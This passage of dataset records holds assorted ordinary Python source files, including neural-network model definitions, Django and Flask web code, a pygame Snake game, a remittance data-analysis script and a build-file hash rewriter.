specify the same value for all spatial dimensions.\n n: Integer, layer repeat times.\n # Returns\n Output tensor.\n \"\"\"\n\n x = _bottleneck(inputs, filters, kernel, t, strides)\n\n for i in range(1, n):\n x = _bottleneck(x, filters, kernel, t, 1, True)\n\n return x\n\n\ndef MobileNetv2(input_shape, k):\n \"\"\"MobileNetv2\n This function defines a MobileNetv2 architectures.\n # Arguments\n input_shape: An integer or tuple/list of 3 integers, shape\n of input tensor.\n k: Integer, number of classes.\n # Returns\n MobileNetv2 model.\n \"\"\"\n\n # inputs = Input(shape=input_shape)\n # x = _conv_block(inputs, 32, (3, 3), strides=(2, 2))\n #\n # x = _inverted_residual_block(x, 16, (3, 3), t=1, strides=1, n=1)\n # x = _inverted_residual_block(x, 24, (3, 3), t=6, strides=2, n=2)\n # x = _inverted_residual_block(x, 32, (3, 3), t=6, strides=2, n=3)\n # x = _inverted_residual_block(x, 64, (3, 3), t=6, strides=2, n=4)\n # x = _inverted_residual_block(x, 96, (3, 3), t=6, strides=1, n=3)\n # x = _inverted_residual_block(x, 160, (3, 3), t=6, strides=2, n=3)\n # x = _inverted_residual_block(x, 320, (3, 3), t=6, strides=1, n=1)\n #\n # x = _conv_block(x, 1280, (1, 1), strides=(1, 1))\n # x = GlobalAveragePooling2D()(x)\n # x = Reshape((1, 1, 1280))(x)\n # x = Dropout(0.3, name='Dropout')(x)\n # x = Conv2D(k, (1, 1), padding='same')(x)\n #\n # x = Activation('softmax', name='softmax')(x)\n # output = Reshape((k,))(x)\n #\n # model = Model(inputs, output)\n # 
plot_model(model, to_file='images/MobileNetv2.png', show_shapes=True)\n\n # model = Sequential()\n # mob = mobilenet.MobileNet(input_shape=input_shape, alpha=1.0, depth_multiplier=1, dropout=1e-3, include_top=True,\n # weights='imagenet', input_tensor=None, pooling=None, classes=1000)\n # model.add(Dense(1000, input_shape=(26,)))\n # model.add(mob)\n #\n # model.layers.pop()\n # output = Reshape((26,))\n # # model.add(output)\n # # model2 = Model(model.input, output)\n # for i in model.layers:\n # print(i)\n\n # load vgg16 without dense layer and with theano dim ordering\n base_model = mobilenet.MobileNet(weights='imagenet', include_top=False, input_shape=(128, 128, 3))\n\n # number of classes in your dataset e.g. 20\n num_classes = 26\n\n x = Flatten()(base_model.output)\n predictions = Dense(num_classes, activation='softmax')(x)\n\n # create graph of your new model\n head_model = Model(input=base_model.input, output=predictions)\n\n model = head_model\n\n return model\n\n\nif __name__ == '__main__':\n MobileNetv2((224, 224, 3), 100)\n","sub_path":"mobilenet_v2.py","file_name":"mobilenet_v2.py","file_ext":"py","file_size_in_byte":6210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"197675130","text":"import sys\nimport os\nimport csv\n\nsys.path.append(r\"C:\\Users\\estasney\\PycharmProjects\\FlaskAPIWeb\\mysite\")\n# sys.path.append(\"/home/estasney1/mysite\")\n\nfrom app_folder import create_app\nfrom app_folder.models import LinkedInRecord\n\nprint(\"Fetching Records\")\n\nsave_path = 'corpus.csv'\n\napp = create_app()\napp.app_context().push()\n\n\nprofiles = LinkedInRecord.query.all()\n\nwith open(save_path, 'w+', newline='', encoding='utf-8') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(['member_id', 'title', 'company', 'summary', 'skills'])\n\n for profile in profiles:\n member_id = profile.member_id\n profile_text = []\n profile_text.append(profile.summary)\n title = \"\"\n company = \"\"\n for job in profile.jobs:\n if job.index == 0:\n title = job.title\n company = job.companyName\n profile_text.append(job.summary)\n\n profile_text = list(filter(lambda x: x is not None and len(x) > 5, profile_text))\n if not profile_text:\n profile_text = \"\"\n else:\n profile_text = [x.replace(\"\\n\", \" \").replace(\"\\t\", \" \") for x in profile_text]\n profile_text = \"\\n\".join(profile_text)\n\n skills = profile.skills if profile.skills else \"\"\n\n writer.writerow([member_id, title, company, profile_text, skills])\n","sub_path":"scripts2/make_corpus.py","file_name":"make_corpus.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"37729672","text":"from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('', views.home, name='home'),\n path('products/', views.products, name='products'),\n path('create_product/', views.createProduct, name='create_product'),\n path('update_product/', views.updateProduct, name='update_product'),\n path('delete_product/', views.deleteProduct, name='delete_product'),\n path('custumer/', views.custumer, name='custumer'),\n path('create_order/', views.createOrder, name='create_order'),\n path('update_order/', views.updateOrder, name='update_order'),\n path('delete_order/', views.deleteOrder, name='delete_order'),\n path('login/', views.loginPage, name='login'),\n path('register/', views.registerPage, name='register'),\n path('logout/', views.logoutPage, name='logout'),\n path('user/', views.userPage, name='user-page'),\n path('account/', views.accountSetting, name='account-page'),\n]\n\n","sub_path":"Asyari/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"394597812","text":"import torch.nn as nn\r\nimport torch\r\nfrom torchsummary import summary\r\n\r\ndef _make_divisible(v, divisor, min_value=None):\r\n \"\"\"\r\n This function is taken from the original tf repo. It ensures that all layers have a channel number that is divisible by 8\r\n It can be seen here: https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\r\n :param v:\r\n :param divisor:\r\n :param min_value:\r\n :return:\r\n \"\"\"\r\n if min_value is None:\r\n min_value = divisor\r\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\r\n # Make sure that round down does not go down by more than 10%.\r\n if new_v < 0.9 * v:\r\n new_v += divisor\r\n return new_v\r\n\r\nclass DoubleConv(nn.Sequential):\r\n def __init__(self, in_ch, out_ch, norm_layer=None, activation_layer=None):\r\n super(DoubleConv, self).__init__(\r\n nn.Conv2d(in_ch , out_ch, kernel_size=1),\r\n norm_layer(out_ch),\r\n activation_layer(out_ch),\r\n nn.Conv2d(out_ch, out_ch, kernel_size=3, padding=1),\r\n norm_layer(out_ch),\r\n activation_layer(out_ch),\r\n nn.UpsamplingBilinear2d(scale_factor=2)\r\n )\r\n\r\nclass ConvBNReLU(nn.Sequential):\r\n def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, groups=1, norm_layer=None, activation_layer=None):\r\n padding = (kernel_size - 1) // 2\r\n super(ConvBNReLU, self).__init__(\r\n nn.Conv2d(in_planes, out_planes, kernel_size, stride, padding, groups=groups, bias=False),\r\n norm_layer(out_planes),\r\n activation_layer(out_planes)\r\n )\r\n\r\nclass InvertedResidual(nn.Module):\r\n def __init__(self, inp, oup, stride, expand_ratio, norm_layer=None, activation_layer=None):\r\n super(InvertedResidual, self).__init__()\r\n self.stride = stride\r\n assert stride in [1, 2]\r\n\r\n hidden_dim = int(round(inp * expand_ratio))\r\n self.use_res_connect = self.stride == 1 and inp == oup\r\n\r\n layers = []\r\n if expand_ratio != 1:\r\n # pw\r\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1, norm_layer=norm_layer, activation_layer=activation_layer))\r\n layers.extend([\r\n # dw\r\n ConvBNReLU(hidden_dim, hidden_dim, stride=stride, groups=hidden_dim, norm_layer=norm_layer, activation_layer=activation_layer),\r\n # pw-linear\r\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\r\n norm_layer(oup),\r\n ])\r\n self.conv = nn.Sequential(*layers)\r\n\r\n def forward(self, x):\r\n if self.use_res_connect:\r\n return x + self.conv(x)\r\n else:\r\n return 
self.conv(x)\r\n\r\nclass LpNetResConcat(nn.Module):\r\n def __init__(self,\r\n input_size,\r\n joint_num,\r\n input_channel = 48,\r\n embedding_size = 2048,\r\n width_mult=1.0,\r\n round_nearest=8,\r\n block=None,\r\n norm_layer=None,\r\n activation_layer=None,\r\n inverted_residual_setting=None):\r\n\r\n super(LpNetResConcat, self).__init__()\r\n\r\n assert input_size[1] in [256]\r\n\r\n if block is None:\r\n block = InvertedResidual\r\n if norm_layer is None:\r\n norm_layer = nn.BatchNorm2d\r\n if activation_layer is None:\r\n activation_layer = nn.PReLU # PReLU does not have inplace True\r\n if inverted_residual_setting is None:\r\n inverted_residual_setting = [\r\n # t, c, n, s\r\n [1, 64, 1, 1], #[-1, 48, 256, 256]\r\n [6, 48, 2, 2], #[-1, 48, 128, 128]\r\n [6, 48, 3, 2], #[-1, 48, 64, 64]\r\n [6, 64, 4, 2], #[-1, 64, 32, 32]\r\n [6, 96, 3, 2], #[-1, 96, 16, 16]\r\n [6, 160, 3, 2], #[-1, 160, 8, 8]\r\n [6, 320, 1, 1], #[-1, 320, 8, 8]\r\n ]\r\n\r\n # building first layer\r\n inp_channel = [_make_divisible(input_channel * width_mult, round_nearest),\r\n _make_divisible(input_channel * width_mult, round_nearest) + inverted_residual_setting[0][1],\r\n inverted_residual_setting[0][1] + inverted_residual_setting[1][1],\r\n inverted_residual_setting[1][1] + inverted_residual_setting[2][1],\r\n inverted_residual_setting[2][1] + inverted_residual_setting[3][1],\r\n inverted_residual_setting[3][1] + inverted_residual_setting[4][1],\r\n inverted_residual_setting[4][1] + inverted_residual_setting[5][1],\r\n inverted_residual_setting[5][1] + inverted_residual_setting[6][1],\r\n inverted_residual_setting[6][1] + embedding_size,\r\n 256 + embedding_size,\r\n ]\r\n self.first_conv = ConvBNReLU(3, inp_channel[0], stride=1, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n inv_residual = []\r\n # building inverted residual blocks\r\n j = 0\r\n for t, c, n, s in inverted_residual_setting:\r\n output_channel = _make_divisible(c * width_mult, round_nearest)\r\n for i in range(n):\r\n stride = s if i == 0 else 1\r\n input_channel = inp_channel[j] if i == 0 else output_channel\r\n inv_residual.append(block(input_channel, output_channel, stride, expand_ratio=t, norm_layer=norm_layer, activation_layer=activation_layer))\r\n j += 1\r\n # make it nn.Sequential\r\n self.inv_residual = nn.Sequential(*inv_residual)\r\n\r\n self.last_conv = ConvBNReLU(inp_channel[j], embedding_size, kernel_size=1, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n self.deonv0 = DoubleConv(inp_channel[j+1], 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n self.deonv1 = DoubleConv(2304, 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n self.deonv2 = DoubleConv(512, 256, norm_layer=norm_layer, activation_layer=activation_layer)\r\n\r\n self.final_layer = nn.Conv2d(\r\n in_channels=256,\r\n out_channels= joint_num * 64,\r\n kernel_size=1,\r\n stride=1,\r\n padding=0\r\n )\r\n\r\n self.avgpool = nn.AvgPool2d(3, stride=2, padding=1, count_include_pad=False)\r\n self.upsample = nn.UpsamplingBilinear2d(scale_factor=2)\r\n\r\n def forward(self, x):\r\n x0 = self.first_conv(x)\r\n x1 = self.inv_residual[0:1](x0)\r\n x2 = self.inv_residual[1:3](torch.cat([x0, x1], dim=1))\r\n x0 = self.inv_residual[3:6](torch.cat([self.avgpool(x1), x2], dim=1))\r\n x1 = self.inv_residual[6:10](torch.cat([self.avgpool(x2), x0], dim=1))\r\n x2 = self.inv_residual[10:13](torch.cat([self.avgpool(x0), x1], dim=1))\r\n x0 = self.inv_residual[13:16](torch.cat([self.avgpool(x1), x2], dim=1))\r\n x1 = 
self.inv_residual[16:17](torch.cat([self.avgpool(x2), x0], dim=1))\r\n x2 = self.last_conv(torch.cat([x0, x1], dim=1))\r\n x0 = self.deonv0(torch.cat([x1, x2], dim=1))\r\n x1 = self.deonv1(torch.cat([self.upsample(x2), x0], dim=1))\r\n x2 = self.deonv2(torch.cat([self.upsample(x0), x1], dim=1))\r\n x0 = self.final_layer(x2)\r\n return x0\r\n\r\n def init_weights(self):\r\n for i in [self.deconv0, self.deconv1, self.deconv2]:\r\n for name, m in i.named_modules():\r\n if isinstance(m, nn.ConvTranspose2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n elif isinstance(m, nn.BatchNorm2d):\r\n nn.init.constant_(m.weight, 1)\r\n nn.init.constant_(m.bias, 0)\r\n for j in [self.first_conv, self.inv_residual, self.last_conv, self.final_layer]:\r\n for m in j.modules():\r\n if isinstance(m, nn.Conv2d):\r\n nn.init.normal_(m.weight, std=0.001)\r\n if hasattr(m, 'bias'):\r\n if m.bias is not None:\r\n nn.init.constant_(m.bias, 0)\r\n\r\nif __name__ == \"__main__\":\r\n model = LpNetResConcat((256, 256), 18)\r\n test_data = torch.rand(1, 3, 256, 256)\r\n test_outputs = model(test_data)\r\n # print(test_outputs.size())\r\n summary(model, (3, 256, 256))","sub_path":"common/backbone/lpnet_res_concat.py","file_name":"lpnet_res_concat.py","file_ext":"py","file_size_in_byte":8398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"466211351","text":"from flask import Flask, request, render_template_string\nfrom OCR import run_image\nimport json\n\napp = Flask(__name__)\n\n\ndef get_webpage():\n res = ''\n for line in open('html/index.html'):\n res += line\n return res\n\n\n@app.route('/languages')\ndef languages():\n config = json.load(open('config.json'))\n return ','.join(config.keys())\n\n\n@app.route('/', methods=[\"GET\", \"POST\"])\ndef index():\n config = json.load(open('config.json'))\n if request.method == 'GET':\n return render_template_string(get_webpage(), langs=config.keys())\n else:\n return run_image(request.files['img'], request.form['lang'])\n","sub_path":"Webserver.py","file_name":"Webserver.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"613754790","text":"from SnakeGameColors import *\nimport random\nimport pygame\nimport os\npygame.init()\npygame.mixer.init()\n\nclock = pygame.time.Clock()\nfont = pygame.font.SysFont(None, 30)\n\nscreen_width = 650\nscreen_height = 450\n\ngameWindow = pygame.display.set_mode((screen_width, screen_height))\npygame.display.set_caption(\"Snake Game\")\n\nstart_bg = pygame.image.load(\"start.jpg\")\nstart_bg = pygame.transform.scale(start_bg, (screen_width, screen_height)).convert_alpha()\n\ngame_bg = pygame.image.load(\"grass.png\")\ngame_bg = pygame.transform.scale(game_bg, (screen_width, screen_width)).convert_alpha()\n\nover_bg = pygame.image.load(\"over.jpg\")\nover_bg = pygame.transform.scale(over_bg, (screen_width, screen_height)).convert_alpha()\n\n\ndef start():\n exit_game = False\n pygame.mixer.music.load(\"intro.mp3\")\n pygame.mixer.music.play(-1)\n while not exit_game:\n gameWindow.fill(yellow)\n gameWindow.blit(start_bg, (0, 0))\n show_on_screen(\"Press Any Key to Start the Game......\", black, 160, 57)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN:\n game_loop()\n pygame.display.update()\n clock.tick(60)\n\n\ndef show_on_screen(text, color, x, y):\n screen_text = font.render(text, True, color)\n 
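# Draw the rendered text surface onto the game window at (x, y).\n    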
gameWindow.blit(screen_text, [x, y])\n\n\ndef grow_snake(base, color, ordinates, size):\n for x, y in ordinates:\n pygame.draw.rect(base, color, [x, y, size, size])\n\n\ndef game_loop():\n if not os.path.exists(\"high_score.txt\"):\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(\"0\")\n with open(\"high_score.txt\", \"r\") as hs:\n high_score = hs.read()\n\n pygame.mixer.music.load(\"bg.mp3\")\n pygame.mixer.music.play(-1)\n\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(75, screen_height - 20)\n food_radius = 5\n velocity_x = 0\n velocity_y = 0\n snake_size = 10\n snake_y = 220\n snake_x = 320\n score = 0\n fps = 50\n\n snake_length = 1\n snake_list = []\n\n exit_game = False\n game_over = False\n\n while not exit_game:\n if game_over:\n gameWindow.fill(white)\n gameWindow.blit(game_bg, (0, 0))\n show_on_screen(\"Game Over!!! Press Return to Continue\", red, 130, 160)\n show_on_screen(\"Your Score : \" + str(score), red, 230, 180)\n show_on_screen(\"High Score : \" + str(high_score), red, 230, 200)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_RETURN:\n game_over = False\n game_loop()\n\n else:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n exit_game = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_UP:\n velocity_y = -5\n velocity_x = 0\n if event.key == pygame.K_DOWN:\n velocity_x = 0\n velocity_y = 5\n if event.key == pygame.K_RIGHT:\n velocity_y = 0\n velocity_x = 5\n if event.key == pygame.K_LEFT:\n velocity_y = 0\n velocity_x = -5\n\n snake_x = snake_x + velocity_x\n snake_y = snake_y + velocity_y\n\n if abs(snake_x - food_x) < 5 and abs(snake_y - food_y) < 5:\n # pygame.mixer.music.load(\"food.mp3\")\n # pygame.mixer.music.play()\n score = score + 10\n snake_length = snake_length + 3\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(50, screen_height - 20)\n # pygame.mixer.music.load(\"bg.mp3\")\n # pygame.mixer.music.play(-1)\n elif abs(food_x - snake_x) < 5 and abs(food_y - snake_y) < 5:\n # pygame.mixer.music.load(\"food.mp3\")\n # pygame.mixer.music.play()\n score = score + 10\n snake_length = snake_length + 3\n food_x = random.randint(20, screen_width - 20)\n food_y = random.randint(50, screen_height - 20)\n # pygame.mixer.music.load(\"bg.mp3\")\n # pygame.mixer.music.play(-1)\n\n gameWindow.fill(white)\n gameWindow.blit(game_bg, (0, 0))\n show_on_screen(\"Score : \" + str(score) + \" High Score : \" + str(high_score), purple, 10, 10)\n pygame.draw.line(gameWindow, brown, (0, 40), (screen_width, 40), 3)\n pygame.draw.circle(gameWindow, red, [food_x, food_y], food_radius)\n\n snake_head = list()\n snake_head.append(snake_x)\n snake_head.append(snake_y)\n snake_list.append(snake_head)\n\n if len(snake_list) > snake_length:\n del snake_list[0]\n\n if snake_head in snake_list[:-1]:\n pygame.mixer.music.load(\"over.mp3\")\n pygame.mixer.music.play()\n if int(high_score) <= score:\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(str(score))\n game_over = True\n\n if snake_x < 0 or snake_x > screen_width or snake_y < 40 or snake_y > screen_height:\n pygame.mixer.music.load(\"over.mp3\")\n pygame.mixer.music.play()\n if int(high_score) <= score:\n with open(\"high_score.txt\", \"w\") as hs:\n hs.write(str(score))\n game_over = True\n\n if int(high_score) < score:\n high_score = score\n\n grow_snake(gameWindow, black, snake_list, snake_size)\n pygame.display.update()\n 
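# Cap the game loop at fps iterations per second.\n            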
clock.tick(fps)\n\n pygame.quit()\n quit()\n\n\nstart()\n","sub_path":"SnakeGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"220114523","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 16 13:31:41 2017\n\n@author: mmic\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Reading the excel file into python with necessary rows and columns\n\nr=pd.read_excel('C:\\\\Users\\\\mmic\\\\Documents\\\\Python Tutorial\\\\Python\\\\'+\n 'Bangladesh_Remittance_HIES2010.xlsx',sheetname=\"Sheet1\",\n index_col=None,na_values=['NA'],skiprows=7,\n parse_cols=\"A,F:G,J:M,P,U\")\n\n## Data cleaning\n\nr['Total_Remittance']=r['Total_money_sent']+r['Value of product sent']\n# Converting total remittance in USD\n# US-BDT exchange rate in 2010\nE=71.17\nr['Total_Remittance']=r['Total_Remittance']/E\n# Converting total stay in abroad in months\nr['Total_Stay']=r['Months spent in abroad']+12*r['Years Spent in abroad']\nr=r[r.Total_Remittance !=0]\n# Deleting the expatriates' information reported as living in Bangladesh \n#(0 is the coutry code for Banglades)\nr=r[r.Country_Code !=0]\n\n# Recoding the country code into country name\nr['Country'] = (r['Country_Code'].map({1:'Saudi Arabia',2:'Qatar',3:'Kuwait',\n 4:'Oman',5:'Malaysia',6:'Singapore',7:'Iraq',8:'Iran',9:'Libya',10:'UAE',\n 11:'Canada',12:'Australia',13:'UK',14:'USA',15:'South Korea',16:'Japan',\n 17:'Turkey',18:'Germany',19:'Sweden',20:'Russia',21:'Other European Countries',\n 23:'Brunei',24:'Mauritius',25:'South Africa',26:'Others'}))\n\n## Graph 1\nplt.style.use('ggplot')\nfig1, ax = plt.subplots()\ngroup_names = ['0 year', '1-5 years','6-10 years','11-12 years','13-16 years',\n '>16 years']\nr['categories'] = pd.cut(r['Level of Education'], bins=[-1,0,5,10,12,16,18], \n labels=['0 year', '1-5 years','6-10 years',\n '11-12 years','13-16 years', '>16 years'])\ncounts = r['categories'].value_counts(sort=False)\nplt.axis('equal')\nexplode = (0.2, 0.1,0.1,0.2,0.1,0.1)\ncolors = ['#c0d6e4','#6a6aa7','#40e0d0','#ee6363','#0071C6','#008DB8',]\ncounts.plot(kind='pie', fontsize=12,colors=colors,explode=explode,autopct='%.2f')\nplt.legend(labels=group_names,loc=2,bbox_to_anchor=(0.8,0.4))\nplt.ylabel('')\nplt.title('Graph-1: Level of Education of the expatriates (In Percentage)')\n# save graph 1\nfig1.savefig('Graph-1.png', transparent=False, dpi=90, bbox_inches=\"tight\")\n\n# Graph 2\nfig2, ax = plt.subplots()\nr.groupby('Country')['Total_Remittance'].sum().plot(kind='bar')\nplt.ylabel('Remittance Amount (USD)')\nplt.title('Graph-2: Remittance Inflow by the Location of Expatriates')\n# save graph 2\nfig2.savefig('Graph-2.png', transparent=False, dpi=90, bbox_inches=\"tight\")\n\n# Graph 3\nfig3, ax = plt.subplots()\nplt.scatter(r['Level of Education'], np.log(r['Total_Remittance']), alpha=0.15,\n marker='o')\nplt.plot(np.unique(r['Level of Education']),\n np.poly1d(np.polyfit(r['Level of Education'],\n np.log(r['Total_Remittance']), 1))\n (np.unique(r['Level of Education'])),color='Black', \n linestyle=\"--\", linewidth=2)\nplt.scatter(r['Level of Education'], np.log(r['Total_Remittance']), \n alpha=0.15, marker='o')\nplt.ylabel('Remittance (Log)')\nplt.xlabel('Level of Education (Years)')\nplt.title('Graph-3: Remittance and Level of Education')\n# save graph 3\nfig3.savefig('Graph-3.png', transparent=False, dpi=90, 
bbox_inches=\"tight\")","sub_path":"ProblemSets/ProblemSet5/PS5_Chowdhury.py","file_name":"PS5_Chowdhury.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"169670158","text":"import torch\nimport numpy as np\nfrom sklearn import metrics\nfrom sklearn.metrics import log_loss\n\n# https://www.kaggle.com/c/rfcx-species-audio-detection/discussion/198418#1086063\ndef _one_sample_positive_class_precisions(scores, truth):\n num_classes = scores.shape[0]\n pos_class_indices = np.flatnonzero(truth > 0)\n\n if not len(pos_class_indices):\n return pos_class_indices, np.zeros(0)\n\n retrieved_classes = np.argsort(scores)[::-1]\n\n class_rankings = np.zeros(num_classes, dtype=np.int)\n class_rankings[retrieved_classes] = range(num_classes)\n\n retrieved_class_true = np.zeros(num_classes, dtype=np.bool)\n retrieved_class_true[class_rankings[pos_class_indices]] = True\n\n retrieved_cumulative_hits = np.cumsum(retrieved_class_true)\n\n precision_at_hits = (\n retrieved_cumulative_hits[class_rankings[pos_class_indices]] /\n (1 + class_rankings[pos_class_indices].astype(np.float)))\n return pos_class_indices, precision_at_hits\n\ndef lwlrap(truth, scores):\n assert truth.shape == scores.shape\n num_samples, num_classes = scores.shape\n precisions_for_samples_by_classes = np.zeros((num_samples, num_classes))\n for sample_num in range(num_samples):\n pos_class_indices, precision_at_hits = _one_sample_positive_class_precisions(scores[sample_num, :], truth[sample_num, :])\n precisions_for_samples_by_classes[sample_num, pos_class_indices] = precision_at_hits\n\n labels_per_class = np.sum(truth > 0, axis=0)\n weight_per_class = labels_per_class / float(np.sum(labels_per_class))\n\n per_class_lwlrap = (np.sum(precisions_for_samples_by_classes, axis=0) /\n np.maximum(1, labels_per_class))\n return per_class_lwlrap, weight_per_class\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nclass MetricMeter(object):\n def __init__(self):\n self.reset()\n \n def reset(self):\n self.y_true = []\n self.y_pred = []\n \n def update(self, y_true, y_pred):\n self.y_true.extend(y_true.cpu().detach().numpy().tolist())\n self.y_pred.extend(torch.sigmoid(y_pred).cpu().detach().numpy().tolist())\n\n @property\n def avg(self):\n \n score_class, weight = lwlrap(np.array(self.y_true), np.array(self.y_pred))\n self.score = (score_class * weight).sum()\n\n return {\n \"lwlrap\" : self.score\n }\n","sub_path":"BASELINE/Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"204760029","text":"\"\"\"A Python script to rewrite hashes in BUILD files.\"\"\"\n\nimport ast\n\n\n# These are templated in by Go. 
It's a bit hacky but is a way of avoiding\n# passing arbitrary arguments through Go / C calls.\nFILENAME = '__FILENAME__'\nTARGETS = {__TARGETS__}\nPLATFORM = '__PLATFORM__'\n\n\ndef is_a_target(node):\n \"\"\"Returns the name of a node if it's a target that we're interested in.\"\"\"\n if isinstance(node, ast.Expr) and isinstance(node.value, ast.Call):\n for keyword in node.value.keywords:\n if keyword.arg == 'name':\n if isinstance(keyword.value, ast.Str) and keyword.value.s in TARGETS:\n return keyword.value.s\n\n\ndef replace_hash(line, before, after):\n \"\"\"Rewrites a hash within one particular line. Returns updated line.\"\"\"\n quote = lambda s, q: q + s + q\n return line.replace(quote(before, '\"'), quote(after, '\"')).replace(quote(before, \"'\"), quote(after, \"'\"))\n\n\nwith _open(FILENAME) as f:\n lines = f.readlines()\n tree = ast.parse(''.join(lines), filename=FILENAME)\n\nfor node in ast.iter_child_nodes(tree):\n name = is_a_target(node)\n if name:\n for keyword in node.value.keywords:\n if keyword.arg == 'hashes' and isinstance(keyword.value, ast.List):\n # lineno - 1 because lines in the ast are 1-indexed\n candidates = {dep.s: dep.lineno - 1 for dep in keyword.value.elts\n if isinstance(dep, ast.Str)}\n # Filter by any leading platform (i.e. linux_amd64: abcdef12345).\n platform_candidates = {k: v for k, v in candidates.items() if PLATFORM in k}\n prefix = ''\n if len(platform_candidates) == 1:\n candidates = platform_candidates\n prefix = PLATFORM + ': '\n # Should really do something here about multiple hashes and working out which\n # is which...\n current, lineno = candidates.popitem()\n prefix, colon, _ = current.rpartition(':')\n if colon:\n colon += ' '\n lines[lineno] = replace_hash(lines[lineno], current, prefix + colon + TARGETS[name])\n elif keyword.arg == 'hash' and isinstance(keyword.value, ast.Str):\n lineno = keyword.value.lineno - 1\n current = keyword.value.s\n prefix = current[:current.find(':') + 2] if ': ' in current else ''\n lines[lineno] = replace_hash(lines[lineno], current, prefix + TARGETS[name])\n\n\nwith _open(FILENAME, 'w') as f:\n for line in lines:\n f.write(line)\n","sub_path":"src/hashes/hash_rewriter.py","file_name":"hash_rewriter.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"28"} +{"seq_id":"351405357","text":"from django.conf.urls import url\n\nfrom . import views\n\n\napp_name = 'projects'\nurlpatterns = [\n url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)$', views.worklogs, name='worklogs'),\n url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)/(?P\\d+)$', views.detail, name='detail'),\n # url(r'^(?P\\w+)/(?P\\w+)-(?P\\d+)/(?P\\d+)/edit$', views.edit_worklog, name='edit_worklog'),\n # url(r'^save$', views.save_worklog, name='save_worklog'),\n]\n","sub_path":"soloist/apps/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"408573099","text":"# from .models import Question\n# from django.http import HttpResponse\n\nfrom django.shortcuts import render, get_object_or_404\nfrom .forms import PostForm\nfrom django.template import loader\nfrom django.utils import timezone\nfrom .models import Post\nfrom django.shortcuts import redirect\n\n# def index(request):\n\n # return HttpResponse(\"Hello, world. 
You're at the polls index.\")\n# def detail(request, question_id):\n # return HttpResponse(\"You're looking at question %s.\" % question_id)\n# def results(request, question_id):\n\n # response = \"You're looking at the results of question %s.\"\n # return HttpResponse(response % question_id)\n# def vote(request, question_id):\n # return HttpResponse(\"You're voting on question %s.\" % question_id)\n# def index(request):\n # latest_question_list = Question.objects.order_by('-pub_date')[:5]\n # template = loader.get_template('polls/index.html')\n # context = { 'latest_question_list': latest_question_list, }\n\n # return HttpResponse(template.render(context, request))\n\n#Post.objects.get(pk=pk)\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_list(request):\n\n post = Post.objects.filter( published_date__lte=timezone.now()).order_by('published_date')\n return render(request, 'polls/postlist.html', {'post': post})\n\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_detail(request, pk):\n \n post = get_object_or_404(Post, pk=pk)\n return render(request, 'polls/post_detail.html', {'post': post})\n\n# ----------------------------------------//-------------------------------------------------------\n\n\ndef post_new(request):\n\n\n if request.method == \"POST\":\n form = PostForm(request.POST)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n else:\n form = PostForm()\n return render(request, 'polls/post_edit.html', {'form': form})\n\n \n \n# ----------------------------------------//-------------------------------------------------------\n\ndef post_edit(request, pk):\n post = get_object_or_404(Post, pk=pk)\n if request.method == \"POST\":\n form = PostForm(request.POST, instance=post)\n if form.is_valid():\n post = form.save(commit=False)\n post.author = request.user\n post.published_date = timezone.now()\n post.save()\n return redirect('post_detail', pk=post.pk)\n 